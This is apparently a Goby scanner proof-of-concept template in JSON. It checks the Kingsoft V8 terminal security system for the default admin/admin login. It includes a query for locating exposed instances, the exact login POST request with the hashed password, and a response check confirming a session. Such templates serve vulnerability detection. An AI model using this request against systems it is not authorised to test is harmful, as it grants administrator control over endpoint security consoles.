-
Notifications
You must be signed in to change notification settings - Fork 8
/
Kingsoft_V8_Default_weak_password.json
53 lines (53 loc) · 2.1 KB
/
Kingsoft_V8_Default_weak_password.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
{
"Name": "Kingsoft V8 Default weak password",
"Level": "2",
"Tags": [
"Default weak password"
],
"GobyQuery": "app=\"kingsoft-V8+-Terminal-security-system\"",
"Description": "The default weak password exists in the Jinshan V8 terminal security system, so the attacker can obtain all the host permissions (admin/admin)",
"Product": "Kingsoft V8",
"Homepage": "https://www.ejinshan.net/",
"Author": "PeiQi",
"Impact": "<p>the attacker can obtain all the host permissions<br></p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/inter/ajax.php?cmd=get_user_login_cmd",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": "{\"get_user_login_cmd\":{\"name\":\"admin\",\"password\":\"21232f297a57a5a743894a0e4a801fc3\"}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "userSession",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-12 11:16:16",
"GobyVersion": "1.8.258"
}